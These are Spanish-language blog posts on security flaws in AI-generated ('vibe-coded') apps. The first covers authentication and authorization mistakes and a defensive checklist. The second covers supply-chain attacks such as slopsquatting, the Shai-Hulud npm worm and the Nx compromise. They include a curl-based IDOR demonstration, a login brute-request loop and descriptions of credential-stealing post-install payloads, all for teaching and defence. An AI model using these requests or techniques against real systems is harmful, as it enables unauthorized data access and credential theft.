Sin invalidación de tokens. La autenticación generada por IA raramente implementa revocación de tokens, rotación de refresh tokens o invalidación de sesiones. Si un usuario cambia su contraseña, sus tokens antiguos siguen funcionando. Si un administrador necesita forzar el cierre de sesión de un usuario, no hay mecanismo para hacerlo.

OAuth y Login Social: El Atajo Engañoso

«Añade login con Google a mi app» parece la opción segura — que Google se encargue de lo difícil. Pero las implementaciones OAuth generadas por IA introducen sus propios fallos. Los más comunes: omitir el parámetro state (que previene ataques CSRF en el flujo de login), saltarse PKCE (Proof Key for Code Exchange, ahora obligatorio bajo OAuth 2.1), y almacenar tokens de acceso en el lado del cliente en variables JavaScript o localStorage donde cualquier vulnerabilidad XSS puede robarlos.

La IA genera el flujo OAuth que funciona en el camino feliz — el usuario pulsa «Iniciar sesión con Google», es redirigido, vuelve autenticado. Pero las propiedades de seguridad de OAuth dependen de detalles de implementación que la IA omite consistentemente, porque los tutoriales con los que entrenó también los omiten.

El Problema Compuesto

Estos fallos se componen. Un token que nunca expira, firmado con un secreto adivinable, usando una biblioteca que acepta el algoritmo none — eso no es una vulnerabilidad, es una puerta abierta con la llave pegada en el marco. Y como JWT es stateless por diseño, no hay sesión del lado del servidor que inspeccionar o revocar. El token es la sesión. Si el token está comprometido, la sesión está comprometida hasta que se rote el propio secreto de firma, lo que invalida cada sesión activa de cada usuario.

Qué Comprobar

Decodifica uno de tus JWTs en jwt.io. ¿Tiene un claim exp? Si no, tus tokens nunca expiran. Comprueba tu secreto de firma — ¿es una cadena corta y adivinable, o una clave generada aleatoriamente de forma adecuada? Prueba si tu API acepta tokens firmados con el algoritmo none. Y comprueba si cambiar la contraseña de un usuario invalida sus tokens existentes.


Patrón 4: Controles de Acceso Ausentes — Cuando Todo el Mundo Es Admin

El Patrón

Incluso cuando la IA acierta con la autenticación — el usuario puede iniciar sesión, el token se valida en el servidor, la sesión tiene expiración — casi nunca implementa autorización adecuada. La autenticación responde a «¿quién eres?» La autorización responde a «¿qué tienes permitido hacer?» La IA maneja la primera pregunta. Ignora la segunda.

La app típica generada por IA tiene dos roles: conectado y no conectado. Eso es todo. Sin distinción admin vs. usuario regular. Sin permisos a nivel de recurso. Sin controles de acceso a nivel de fila más allá de comprobaciones básicas de «tu ID de usuario coincide con el ID del registro» — y incluso esas son inconsistentes.

Referencias Directas Inseguras a Objetos (IDOR)

Este es el fallo de control de acceso más común en apps vibe-coded. La API usa IDs enteros secuenciales: /api/notes/1, /api/notes/2, /api/notes/3. La IA genera endpoints que obtienen registros por ID sin verificar que el usuario solicitante sea el propietario de ese registro. Así es el ataque completo:

# Autenticarse como Usuario A (ID de usuario: 42)
TOKEN=$(curl -s -X POST https://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"email":"usuarioa@test.com","password":"password123"}' \
  | jq -r '.token')

# Acceder a las notas del propio Usuario A — el endpoint obtiene notas por ID de usuario
curl -H "Authorization: Bearer $TOKEN" https://target.com/api/users/42/notes
# {"notes": [{"id": 101, "content": "Nota privada del Usuario A"}]}

# Ahora pedir las notas del Usuario B (ID de usuario: 43) — mismo token, distinto ID de usuario en la URL
curl -H "Authorization: Bearer $TOKEN" https://target.com/api/users/43/notes
# {"notes": [{"id": 205, "content": "Nota privada del Usuario B"}]}  ← IDOR

Tres peticiones. El token del Usuario A da acceso a las notas del Usuario B porque el endpoint comprueba autenticación («¿es este un token válido?») pero no autorización («¿pertenece este token al usuario 43?»). El ID de usuario en la URL controla de quién se devuelven los datos, y el servidor nunca verifica que coincida con el usuario autenticado.

La app QuickNote en realidad lo hace parcialmente bien — limita la consulta de notas por userId. Pero muchas apps generadas por IA no lo hacen. E incluso QuickNote no impide que un usuario modifique o elimine notas de otro si conoce el ID de la nota, porque las operaciones de actualización y eliminación (que la IA ni siquiera generó — una funcionalidad ausente que en sí misma es una brecha de seguridad) no incluirían necesariamente la comprobación de propiedad.

Caso Real: La Brecha BOLA de Lovable

En abril de 2026, investigadores de seguridad divulgaron una vulnerabilidad de Autorización Rota a Nivel de Objeto (BOLA) en Lovable — la plataforma de vibe coding valorada en 6.600 millones de dólares. Los endpoints de API /projects/{id}/* verificaban tokens de autenticación de Firebase pero omitían completamente las comprobaciones de propiedad. Cinco llamadas API desde una cuenta gratuita bastaban para acceder al código fuente, credenciales de base de datos, historiales de chat con IA y datos de clientes de cualquier otro usuario. Todos los proyectos creados antes de noviembre de 2025 quedaron expuestos. Los investigadores encontraron datos de empleados de Nvidia, Microsoft, Uber y Spotify en los proyectos accesibles.

Este es el Patrón 4 en su forma más pura. La autenticación funcionaba — necesitabas un token válido de Firebase. La autorización estaba ausente — ese token válido te dejaba leer los datos de cualquiera. La plataforma dejó la vulnerabilidad abierta durante 48 días después del informe inicial, cerró informes de seguimiento como duplicados, y al principio calificó los datos expuestos como «comportamiento intencionado.»

La brecha de Lovable merece estudio porque no ocurrió en el proyecto paralelo de alguien. Ocurrió en la propia plataforma — la herramienta en la que millones de vibe coders confían para generar sus aplicaciones. Si la plataforma no consigue hacer bien la autorización, ¿qué probabilidades hay de que las apps construidas sobre ella lo hagan?

Por Qué la IA Falla en Esto

La autorización es inherentemente contextual. Depende de la lógica de negocio — quién debería ver qué, quién puede editar qué, qué acciones requieren privilegios elevados. La IA no puede inferir tus reglas de negocio de un prompt como «construye una app de notas.» Te da la implementación funcional más simple: los usuarios autenticados pueden acceder a sus propios datos. Cualquier cosa más compleja — roles de admin, acceso basado en equipos, recursos compartidos con permisos granulares — requiere diseño explícito que el vibe coder nunca especificó.

Este es uno de los puntos donde la brecha entre «app funcional» y «app segura» es más amplia. La app funciona para cada usuario en aislamiento. Solo falla cuando un usuario intenta acceder a los datos de otro — un caso de prueba que los vibe coders casi nunca ejecutan, porque están probando sus propias funcionalidades, no probando contra otros usuarios.

Qué Comprobar

Inicia sesión como Usuario A. Intenta acceder a los recursos del Usuario B manipulando IDs, parámetros o rutas de API. Si cualquier acceso entre usuarios funciona, tienes IDOR. Comprueba si los endpoints de administración requieren un rol de admin o solo un token válido. Comprueba si las operaciones sensibles (eliminar cuenta, cambiar email, exportar datos) tienen requisitos de autorización adicionales más allá de la autenticación básica.


El Checklist de Autenticación y Secretos

Ejecuta esto contra tu aplicación vibe-coded antes de publicar. Cada elemento se corresponde con un patrón anterior.

Secretos:

  1. Sin claves API, tokens o credenciales en el código fuente — ejecuta gitleaks detect --source . o trufflehog filesystem .
  2. Todos los secretos cargados desde variables de entorno o un gestor de secretos — grep -r "const.*=.*['\"]sk-\|key\|secret\|password" src/
  3. El JavaScript del frontend contiene cero secretos — inspecciona tu bundle compilado: grep -r "API_KEY\|SECRET\|Bearer" dist/
  4. Los archivos .env están en .gitignore — verifica que nunca se hayan commiteado: git log --all --diff-filter=A -- '*.env'
  5. Las credenciales de base de datos usan cuentas de mínimo privilegio — no la cadena de conexión root/admin

Autenticación:

  1. Todas las comprobaciones de autenticación se hacen en el servidor — curl -X GET https://tuapp.com/api/protected sin token. Si devuelve datos, tu autenticación está rota
  2. Contraseñas hasheadas con bcrypt o Argon2 — no MD5, no SHA-256 sin salt
  3. Los tokens JWT incluyen claim exp — decodifica tu token en jwt.io y comprueba el payload
  4. El secreto de firma JWT tiene al menos 256 bits de aleatoriedad — node -e "console.log(require('crypto').randomBytes(32).toString('hex'))" genera uno adecuado
  5. El endpoint de login tiene limitación de tasa — for i in $(seq 1 100); do curl -s -o /dev/null -w "%{http_code}\n" -X POST https://tuapp.com/api/login -d '{"email":"test@test.com","password":"wrong"}'; done — si nunca recibes un 429, no tienes limitación de tasa

Autorización:

  1. Cada endpoint de API comprueba permisos de usuario — no solo autenticación
  2. El acceso a recursos verifica propiedad — inicia sesión como Usuario A, luego `curl -H «Authorization: Bearer » https://tuapp.com/api/resources/` — si devuelve datos del Usuario B, tienes IDOR
  3. Las funciones de admin requieren rol de admin — prueba endpoints de admin con el token de un usuario regular
  4. Las operaciones sensibles requieren re-autenticación o verificación adicional

OAuth (si usas login social):

  1. El flujo OAuth incluye parámetro state para protección CSRF
  2. PKCE está habilitado (busca code_verifier y code_challenge en la petición de autenticación)
  3. Los tokens de acceso se almacenan en el servidor, no en localStorage o variables JavaScript

Gestión de Sesiones:

  1. Los tokens expiran en una ventana razonable (horas, no nunca)
  2. Los cambios de contraseña invalidan sesiones existentes
  3. Existe un mecanismo para forzar la revocación de tokens comprometidos

Esto no es una evaluación de seguridad completa. Pero si tu app vibe-coded falla en cualquiera de estos 20 puntos, tienes una vulnerabilidad crítica que necesita arreglo antes del lanzamiento. Ampliaré esto en un checklist completo para fundadores en la Parte 8 de esta serie.


Lo que Deberías Llevarte de Esto

La demo de QuickNote tiene 67 líneas. Tu app probablemente tiene miles. Cada línea de código de autenticación generada por IA conlleva los mismos riesgos que he mostrado aquí — secretos hardcodeados, comprobaciones del lado del cliente, sesiones rotas, controles de acceso ausentes. La brecha de Lovable demostró que esto no es teórico. El fundador de Enrichlead de la Parte 3 pensó que revisaría la seguridad después. Estaba cerrando en menos de una semana.

Ejecuta el checklist de arriba hoy, no después del lanzamiento. Cada llamada a jwt.sign(), cada hash de contraseña, cada middleware de autenticación que la IA produce necesita una revisión manual — ¿esta comprobación se hace en el servidor, este secreto está externalizado, este token expira, este endpoint verifica autorización y no solo autenticación? Esas preguntas llevan segundos por función, y son la diferencia entre una demo funcional y una aplicación segura.

En VULNEX, los problemas de autenticación aparecen en prácticamente cada aplicación vibe-coded que revisamos — y casi siempre son los hallazgos de mayor gravedad. Mi flujo de trabajo: ejecutar Gitleaks contra el repositorio, revisar el bundle del frontend buscando claves expuestas, probar cada endpoint de API sin el frontend, decodificar los JWTs. Paso las dependencias por npmscan y las contrasto con la base de datos de vulnerabilidades de Snyk — las bibliotecas relacionadas con autenticación son siempre las primeras que reviso.

La IA te construirá una pantalla de login que parece profesional y funciona en una demo. Conseguir que construya autenticación que aguante frente a un atacante real requiere juicio humano y la disciplina de revisar antes de publicar.

Como siempre: no te fíes de nada, verifica todo.


Lecturas Adicionales


Referencias

Publicado en AI, IA, Seguridad, Tecnologia | Etiquetado , , , , , | Deja un comentario

La Trampa de las Dependencias: Riesgos en la Cadena de Suministro del Código Generado por IA (Parte 4)

Serie Vibe Coding Security

  1. ¿Qué es Vibe Coding Security? Guía de Campo para 2026
  2. El OWASP Top 10 para Aplicaciones Vibe-Coded
  3. Anatomía de una Brecha de Vibe Coding: Lecciones de los Peores Incidentes de 2026
  4. La Trampa de las Dependencias: Riesgos en la Cadena de Suministro del Código Generado por IA (estás aquí)
  5. Autenticación y Secretos: Lo que la IA Siempre Hace Mal
  6. [Escaneando Aplicaciones Vibe-Coded: Por Qué el SAST/DAST Tradicional Se Queda Corto] (https://simonroses.com/es/2026/05/escaneando-aplicaciones-vibe-coded-por-que-el-sast-dast-tradicional-se-queda-corto-parte-6/)
  7. Prompt Engineering para Código Seguro
  8. El Checklist de Seguridad del Fundador
  9. Asegurando el Pipeline de Codificación IA
  10. El Futuro de Vibe Coding Security (próximamente)

Tiempo de lectura: 15 minutos

TL;DR

Cada vez que una herramienta de codificación con IA escribe una sentencia import o añade un paquete a tu package.json, está tomando una decisión de cadena de suministro en tu nombre. Los números son preocupantes: el 80% de las dependencias sugeridas por IA contienen riesgos conocidos, el 34% ni siquiera existen en los registros de paquetes, y casi la mitad de las que sí existen contienen vulnerabilidades conocidas. Este artículo cubre ambas caras de la trampa de dependencias. Por un lado, los vibe coders que instalan a ciegas lo que la IA sugiere — incluyendo paquetes que la IA se inventó. Por otro, los atacantes que han descubierto que el código generado por IA es el vector perfecto para ataques a la cadena de suministro, construyendo gusanos autopropagantes y secuestrando sistemas de compilación para recopilar credenciales de desarrolladores. Tres casos, una conclusión: si no auditas tus dependencias, otra persona las está eligiendo por ti — y sus intenciones no son buenas.


Los Números que Deberían Quitarte el Sueño

Antes de entrar en los casos, quiero enmarcar la escala de este problema con datos del informe State of Dependency Management 2025 de Endor Labs. Analizaron 10.663 repositorios en GitHub que implementan servidores MCP — una de las categorías de proyectos vibe-coded de más rápido crecimiento — y probaron las recomendaciones de dependencias de herramientas de codificación con IA en PyPI, npm, Maven y NuGet. Los resultados:

El 80% de las dependencias sugeridas por IA contienen riesgos. Solo uno de cada cinco paquetes recomendados por herramientas de codificación con IA es realmente seguro — libre de vulnerabilidades conocidas, activamente mantenido, correctamente licenciado.

El 34% de las dependencias sugeridas son alucinaciones. No existen en ningún registro de paquetes. La IA se las inventó. Son nombres de paquetes que cualquiera podría registrar — y como veremos en el Caso 1, los atacantes ya lo han descubierto.

El 44–49% de las versiones de dependencias importadas por IA tienen vulnerabilidades conocidas. No son problemas oscuros o teóricos — son CVEs conocidos con exploits publicados. La IA no comprueba si una versión de un paquete está parcheada. Sugiere lo que aprendió de sus datos de entrenamiento, lo que frecuentemente significa fijar versiones obsoletas y vulnerables.

Un estudio académico independiente que analizó 117.062 cambios de dependencias encontró que los agentes de IA seleccionan versiones vulnerables a una tasa del 2,46% frente al 1,64% de los humanos — y cuando lo hacen, las selecciones vulnerables requieren actualizaciones de versión mayor el 36,8% de las veces (comparado con el 12,9% para elecciones humanas). En conjunto, el desarrollo dirigido por agentes produjo un aumento neto de 98 nuevas vulnerabilidades, mientras que los cambios de autoría humana produjeron una reducción neta de 1.316.

Ese es el marco. Ahora los casos.


Caso 1: Slopsquatting — Cuando las Alucinaciones de la IA se Convierten en Vectores de Ataque

El Descubrimiento

En abril de 2025, Seth Larson — Developer-in-Residence de la Python Software Foundation — acuñó un término para algo que los investigadores de seguridad venían observando con creciente alarma: slopsquatting. El concepto es simple. Las herramientas de codificación con IA alucinan nombres de paquetes que no existen. Los atacantes registran esos mismos nombres con payloads maliciosos. Cuando el siguiente desarrollador acepta la sugerencia de la IA sin verificar, instala el paquete del atacante.

Es el sucesor del typosquatting, perfectamente adaptado a la era de la IA. El typosquatting requería que los atacantes adivinaran qué paquetes los desarrolladores escribirían mal. El slopsquatting les da algo mejor: una lista predecible de nombres de paquetes que millones de desarrolladores recibirán como recomendación de su asistente de IA.

La Escala

La confirmación académica llegó en mayo de 2025, cuando los investigadores publicaron «We Have a Package for You!» en USENIX Security 2025. Probaron 16 LLMs diferentes en 756.000 muestras de generación de código y encontraron:

Tasa media de alucinación del 19,6%. Aproximadamente una de cada cinco recomendaciones de paquetes de herramientas de codificación con IA apunta a algo que no existe. Los modelos comerciales (GPT-4, Claude) obtuvieron mejores resultados con alrededor del 5% de alucinación. Los modelos de código abierto alcanzaron el 21% o más.

205.474 nombres de paquetes inexistentes únicos alucinados a través de todos los modelos y prompts. Eso son más de doscientos mil objetivos potenciales de slopsquatting.

El 43% de los nombres alucinados se repiten cuando haces preguntas similares. Pregunta «cómo parseo YAML en Python» diez veces, y el mismo nombre de paquete alucinado aparece el 58% de las veces. Esto significa que los atacantes no necesitan registrar nombres aleatorios — pueden predecir qué paquetes falsos recomendará la IA y registrar esos específicamente.

Los patrones de alucinación se dividen en tres categorías: el 38% son conflaciones — la IA fusiona dos nombres reales de paquetes (como «express-mongoose» combinando Express y Mongoose). El 13% son variantes tipográficas de paquetes reales. Y el 51% son fabricaciones puras — nombres que el modelo generó de la nada.

La Prueba de Concepto

Bar Lanyado de Lasso Security no esperó al paper académico. A principios de 2024, ejecutó el experimento. Pidió a herramientas de IA que generaran código Python para diversas tareas, anotó cada nombre de paquete alucinado, y registró uno: huggingface-cli. No malicioso — solo un paquete vacío con seguimiento analítico. En tres meses, había acumulado más de 30.000 descargas. De un solo nombre alucinado. En un solo registro.

Treinta mil instalaciones a ciegas de un paquete que nadie eligió deliberadamente. Nadie lo buscó en PyPI. Nadie leyó su descripción. Nadie revisó su código fuente. Escribieron lo que la IA les dijo que escribieran, pulsaron enter, y siguieron adelante.

Para un vibe coder — alguien que acepta sugerencias de la IA por defecto, que no lee las sentencias import, que trata pip install como un trámite entre prompts — esto es lo normal. La IA dice instálalo, lo instalas. Si Lanyado hubiera puesto un reverse shell en ese paquete en vez de analíticas, habría comprometido 30.000 máquinas de desarrollo.

Por Qué el Vibe Coding Amplifica Esto

Los desarrolladores tradicionales tienen una defensa contra el slopsquatting. Saben qué paquetes pretenden usar. Cuando escriben import requests, es porque eligieron deliberadamente la librería requests. Notarían si su código de repente importara requestz o python-requests-lib.

Los vibe coders no tienen esa defensa. Están aceptando bloques enteros de código generados por la IA. Las sentencias import se difuminan en la salida. Cuando Claude o Copilot escribe from azure_ml_utils import ModelClient, el vibe coder no se detiene a verificar si azure_ml_utils existe en PyPI. Suena legítimo. El código funciona localmente (quizás el import falla silenciosamente, o quizás ni siquiera se prueba). El nombre del paquete va a requirements.txt y se sube a producción.

Por eso el slopsquatting es un problema de seguridad de vibe coding, no solo un problema de IA. El vector de ataque requiere un desarrollador que instale paquetes sin verificación. El vibe coding crea exactamente ese desarrollador a escala.


Caso 2: Shai-Hulud — El Gusano que npm Nunca Esperó

Primer Contacto

El 14 de septiembre de 2025, un paquete legítimo y bien mantenido — @ctrl/tinycolor con más de 2 millones de descargas semanales — fue comprometido. Pero esto no era un típico secuestro de cuenta ni una publicación maliciosa puntual. Lo que los investigadores de seguridad de Unit 42 de Palo Alto descubrieron fue el primer gusano autopropagante en la historia de npm.

Lo llamaron Shai-Hulud, como los gusanos de arena de Dune. El nombre es apropiado: al igual que esos gusanos crecen consumiendo todo a su paso, este malware crecía consumiendo las cuentas npm de cada desarrollador que infectaba.

Cómo se Propagó

El mecanismo era elegante y aterrador. Una vez que Shai-Hulud comprometía la cuenta npm de un mantenedor — empezando por el mantenedor de @ctrl/tinycolor — no se limitaba a inyectar código malicioso en ese paquete. Recorría cada paquete que el mantenedor controlaba e inyectaba un script post-install en todos ellos. Cada paquete infectado, al ser instalado por otros desarrolladores:

  1. Recopilaba tokens de npm, tokens de GitHub, credenciales de AWS/GCP/Azure usando TruffleHog
  2. Buscaba workflows de GitHub Actions en los repositorios del desarrollador
  3. Inyectaba puertas traseras en esos workflows, dando al atacante acceso persistente
  4. Usaba los tokens de npm robados para publicar versiones infectadas de los propios paquetes del desarrollador

Los paquetes de cada nuevo mantenedor comprometido infectarían a sus consumidores descendentes, que comprometerían sus paquetes, que infectarían a sus consumidores. Crecimiento exponencial. Una reacción en cadena.

Para el 16 de septiembre — solo dos días después del primer contacto — más de 500 paquetes npm estaban infectados. El gusano había saltado de mantenedor en mantenedor, cada salto ampliando su alcance en órdenes de magnitud.

La Evolución

Esa ola inicial de 500 paquetes fue solo el comienzo. A principios de noviembre de 2025, Unit 42 informó de una segunda evolución — Shai-Hulud 2.0 — que había generado más de 25.000 repositorios maliciosos en aproximadamente 350 cuentas únicas de GitHub, impactando más de 10.000 repositorios. El gusano había aprendido. Diversificó sus métodos de propagación, usó payloads ofuscados y apuntó a tipos de credenciales que maximizarían el movimiento lateral.

CISA emitió una alerta en septiembre de 2025 advirtiendo de «compromiso generalizado de la cadena de suministro impactando el ecosistema npm». No es un lenguaje que CISA use a la ligera. No era un incidente localizado. Era contaminación a nivel de ecosistema.

La Conexión con Vibe Coding

¿Y quién se llevó la peor parte? Los desarrolladores más vulnerables a Shai-Hulud fueron los que:

  • Instalaban paquetes sin revisar changelogs ni diffs de versiones
  • Ejecutaban npm install sin auditar scripts post-install
  • No usaban lockfiles ni fijaban versiones exactas
  • Aceptaban actualizaciones de dependencias sugeridas por IA sin revisión

En otras palabras: vibe coders. Cuando tu asistente de IA sugiere actualizar @ctrl/tinycolor a la última versión, no te lo piensas dos veces. Es una librería de utilidades de color. ¿Qué puede salir mal? Aceptas la sugerencia, ejecutas el install, y el script post-install silenciosamente recopila tu token de npm. Ahora tus paquetes están comprometidos. Tus consumidores están comprometidos. El gusano crece.

Los datos de Endor Labs lo respaldan. Cuando las herramientas de IA sugieren versiones de dependencias, el 44–49% contienen vulnerabilidades conocidas. Pero el problema inverso es igualmente peligroso: cuando la IA sugiere la versión «latest», puede estar sugiriendo la versión comprometida. La IA no tiene forma de saber que la versión 4.2.1 de un paquete fue publicada por un gusano en lugar del mantenedor legítimo.

Lo que Esto Enseña

Shai-Hulud demuestra que los ataques a la cadena de suministro han evolucionado más allá del punto donde «no instales paquetes sospechosos» es un consejo adecuado. Los paquetes comprometidos eran legítimos. Tenían millones de descargas semanales. Tenían mantenedores reales y bases de código reales. El ataque no explotó malas prácticas de los consumidores de paquetes — explotó la infraestructura de confianza en sí misma.

Para los vibe coders, la lección es dura: incluso si solo instalas paquetes conocidos y populares, no estás a salvo. El paquete que instalaste ayer podría estar comprometido hoy. Sin fijación de versiones, verificación de lockfiles y auditoría de scripts post-install, estás a un npm install de participar en la cadena de propagación de un gusano.


Caso 3: s1ngularity — Cuando Tu Sistema de Compilación se Vuelve en Tu Contra

El Ataque

El 26 de agosto de 2025, desarrolladores en miles de proyectos recibieron una sorpresa desagradable. El sistema de compilación Nx — usado por grandes empresas y proyectos open-source para gestión de monorepos — había sido comprometido. No mediante un salto en la cadena de suministro ni un ataque de confusión de dependencias, sino mediante un exploit directo de su pipeline de CI/CD en GitHub Actions.

El atacante encontró una vulnerabilidad de inyección en el workflow pull_request_target — un trigger de GitHub Actions notoriamente peligroso que se ejecuta con privilegios elevados. Creando un título de pull request malicioso, el atacante obtuvo acceso a los tokens de publicación npm de Nx y publicó versiones comprometidas de paquetes core de Nx (versiones 20.9.0 a 21.8.0).

El ataque estuvo activo aproximadamente cuatro horas antes de que GitGuardian detectara la anomalía y npm revocara los tokens. Cuatro horas. En esa ventana:

  • 2.349 secretos distintos se filtraron de máquinas de desarrolladores
  • 1.346 repositorios fueron detectados con filtración de credenciales
  • Los secretos recopilados incluían tokens de GitHub, tokens de publicación npm, claves privadas SSH, claves API y credenciales de carteras de criptomonedas

El Payload Post-Install

Los paquetes maliciosos de Nx contenían un script post-install que se activaba inmediatamente con npm install. El payload:

  1. Escaneaba el sistema de archivos del desarrollador buscando archivos de credenciales (.npmrc, .ssh/, .env, archivos de credenciales AWS, configuración de GitHub CLI)
  2. Buscaba variables de entorno con tokens y claves API
  3. Exfiltraba todo a un repositorio público de GitHub usando la herramienta CLI gh (autenticándose con el propio token de GitHub del desarrollador)
  4. Apuntaba específicamente a credenciales de herramientas de IA — escaneando claves API de Claude y Gemini

Ese último punto es crítico. El atacante apuntó específicamente a credenciales de herramientas de codificación con IA. No es coincidencia. Los desarrolladores que usan herramientas de IA a menudo almacenan claves API localmente, y esas claves dan acceso a servicios de pago. Tokens de herramientas de IA comprometidos pueden usarse para generar contenido, ejecutar inferencia o acceder a recursos cloud asociados.

El Ángulo del Vibe Coding

Conecta esto con el vibe coding. Considera la configuración típica: estás construyendo un monorepo, tu asistente de IA sugiere usar Nx para la gestión del workspace. Aceptas. La IA genera un package.json con Nx como dependencia de desarrollo. Ejecutas npm install. El script post-install se ejecuta. Tus credenciales desaparecen.

En ningún momento de este flujo un vibe coder tiene razón para sospechar. Nx es una herramienta legítima y ampliamente usada. La recomendación de la IA era correcta. El paquete fue publicado en el registro oficial de npm bajo el scope oficial de Nx. No hubo alucinación, ni typosquat, ni señal de alarma obvia. El compromiso ocurrió upstream, y el flujo de trabajo del vibe coder — aceptar sugerencia de la IA, instalar, seguir prompting — proporcionó fricción cero para prevenirlo.

Pero el problema más profundo es lo que ocurre después de que las credenciales de un desarrollador son comprometidas. Si ese desarrollador es mantenedor de paquetes — y muchos desarrolladores activos lo son — el atacante ahora tiene acceso de publicación a sus paquetes. La misma cascada que alimentó a Shai-Hulud. Un sistema de compilación comprometido lleva a miles de máquinas de desarrolladores comprometidas, cada una potencialmente un punto de apoyo para publicar más ataques.

Lo que Conecta los Casos

El informe de amenazas de mediados de 2025 de Socket puso un número a la tendencia más amplia: 454.648 paquetes maliciosos fueron publicados en registros de paquetes solo en 2025. Más del 99% del malware open-source apuntó específicamente a npm. La campaña IndonesianFoods sola generó más de 100.000 paquetes en el Q4 de 2025 — uno cada siete segundos, casi con certeza automatizado con IA.

Esa es la otra cara de esta moneda. No es solo que las herramientas de IA sugieran malas dependencias. Es que los atacantes están usando IA para crear malas dependencias a escala. La cadena de suministro está siendo atacada desde ambas direcciones simultáneamente — la IA alucinando nombres de paquetes que los atacantes registran, y la IA generando paquetes maliciosos más rápido de lo que los humanos pueden revisar.


El Amplificador del Vibe Coding

Alejémonos de los casos individuales y el patrón se hace claro. Los ataques a la cadena de suministro existían antes del vibe coding. El malware npm existía antes de las herramientas de IA. Lo que hace el vibe coding es eliminar cada punto de control humano que podría haber detectado el ataque.

Flujo tradicional: El desarrollador quiere parsear fechas → busca en npm librerías de fechas → lee el README, comprueba descargas, mira el historial de mantenimiento → selecciona date-fns → lo añade al package.json → la revisión de código detecta si aparece algo inesperado.

Flujo de vibe coding: El desarrollador prompta «añade formateo de fechas a este componente» → la IA escribe código importando date-format-utils → el desarrollador acepta el bloque → se ejecuta npm install → hecho. Nadie preguntó qué es date-format-utils. Nadie comprobó si existe. Nadie verificó quién lo publica o cuándo se actualizó por última vez.

Las cinco decisiones humanas que constituían la defensa de la cadena de suministro — elegir un paquete, verificar su legitimidad, comprobar su estado de mantenimiento, revisar el import en revisión de código, monitorizar cambios inesperados — colapsan en una sola acción: aceptar la sugerencia de la IA.

Esto no es una preocupación teórica. Los números lo demuestran. Endor Labs encontró que los agentes de IA producen un aumento neto de 98 vulnerabilidades a través de sus elecciones de dependencias, mientras los humanos producen una disminución neta de 1.316. El proceso de curación humano — imperfecto como es — realmente reduce el riesgo de cadena de suministro. Elimínalo, y el riesgo se acumula sin control.


Defendiéndose de la Trampa de Dependencias

El problema es estructural, pero las soluciones son prácticas. Esto es lo que funciona:

Para Desarrolladores Individuales

Verifica antes de instalar. Cuando tu IA sugiera un paquete, dedica diez segundos a comprobar: ¿existe en el registro? ¿Quién lo mantiene? ¿Cuándo se actualizó por última vez? ¿Cuántas descargas tiene? Este simple paso derrota completamente al slopsquatting.

Usa lockfiles religiosamente. package-lock.json, yarn.lock, poetry.lock — estos fijan versiones exactas y hashes de integridad. Si una versión comprometida se publica, tu lockfile previene la adopción automática hasta que actualices explícitamente.

Audita scripts post-install. Ejecuta npm install --ignore-scripts primero, luego revisa qué scripts post-install existen antes de permitir su ejecución. Herramientas como Socket marcan paquetes con scripts de instalación sospechosos.

Fija tus dependencias. No uses rangos ^ o ~ en producción. Fija versiones exactas. Actualiza deliberadamente, no automáticamente.

Personalmente, siempre que realizo una revisión de seguridad en VULNEX, el package.json es una de las primeras cosas que abro. Paso cada dependencia por npmscan y la contrasto con la base de datos de vulnerabilidades de Snyk. Lleva cinco minutos y he perdido la cuenta de las veces que ha detectado paquetes que no tenían nada que hacer en una aplicación en producción — obsoletos, sin mantenimiento, o con CVEs críticos conocidos que el desarrollador nunca vio porque la IA eligió la dependencia, no él.

Para Equipos

Implementa una lista de dependencias permitidas. Aprueba paquetes y versiones específicos. Bloquea todo lo que no haya sido verificado. Esto añade fricción — ese es el punto.

Ejecuta SCA en CI/CD. Las herramientas de Software Composition Analysis (Snyk, Socket, Endor Labs) detectan vulnerabilidades conocidas y paquetes sospechosos antes de que lleguen a producción. Haz que la build falle si una dependencia no ha sido aprobada.

Monitoriza anomalías en la cadena de suministro. Vigila paquetes que cambian de mantenedor repentinamente, que añaden scripts post-install donde antes no existían, o que muestran patrones de publicación inusuales. Herramientas como la detección de anomalías de Socket las marcan automáticamente.

Trata las elecciones de dependencias generadas por IA igual que el código generado por IA: revísalas antes de aceptarlas.

Para el Ecosistema

La solución más amplia requiere cambios a nivel de registro — controles de publicación más estrictos, 2FA obligatorio, firma de paquetes y verificación de procedencia. npm ha avanzado en algunos de estos. Pero hasta que sean universales, la responsabilidad de defensa recae en los consumidores.


Lo que Deberías Llevarte de Esto

Si eres un fundador haciendo vibe-coding de tu MVP: tu asistente de IA acaba de añadir quince paquetes a tu package.json. ¿Cuántos de esos elegiste tú? ¿Cuántos siquiera miraste? Ejecuta npm audit ahora mismo. Comprueba si cada paquete en tu lockfile realmente existe en el registro y tiene un mantenedor activo. Uno de esos paquetes podría ser una alucinación que nadie ha registrado todavía — o que un atacante registró la semana pasada.

Si eres desarrollador: el slopsquatting significa que las recomendaciones de paquetes de la IA son una superficie de ataque, no una comodidad. Construye el hábito de verificar imports de la misma forma que verificas la lógica del código. Y revisa tus scripts post-install — npm install no es una operación segura solo porque el nombre del paquete suena familiar.

Si estás en seguridad: el modelo de amenazas de cadena de suministro tiene un nuevo punto de entrada. Las herramientas de codificación con IA están efectivamente tomando decisiones de dependencias en nombre de desarrolladores que carecen del contexto para verificarlas. Actualiza tus herramientas de SCA para marcar específicamente nombres de paquetes alucinados por IA. Incluye la revisión de selección de dependencias en tu proceso de revisión de código. Y si estás evaluando una aplicación vibe-coded, lo primero que debes auditar es su package.json — te garantizo que encontrarás paquetes que no deberían estar ahí.

La trampa de dependencias funciona porque explota la confianza en todos los niveles. Los desarrolladores confían en las recomendaciones de la IA. Los consumidores confían en paquetes populares. Los mantenedores confían en sus pipelines de CI/CD. Los atacantes han encontrado formas de explotar las tres relaciones de confianza simultáneamente. La única defensa es la verificación — y la verificación es exactamente lo que el flujo de «acepto y sigo» del vibe coding elimina.

En el siguiente artículo, cubriré otro patrón donde la IA falla consistentemente: la gestión de autenticación y secretos. Controles de autenticación del lado del cliente, claves API hardcodeadas y falta de RBAC — lo que convierte cada app vibe-coded en un objetivo.

Como siempre: no te fíes de nada, verifica todo.


Lecturas Adicionales


Referencias

Publicado en AI, IA, Seguridad, Tecnologia | Etiquetado , , , , | Deja un comentario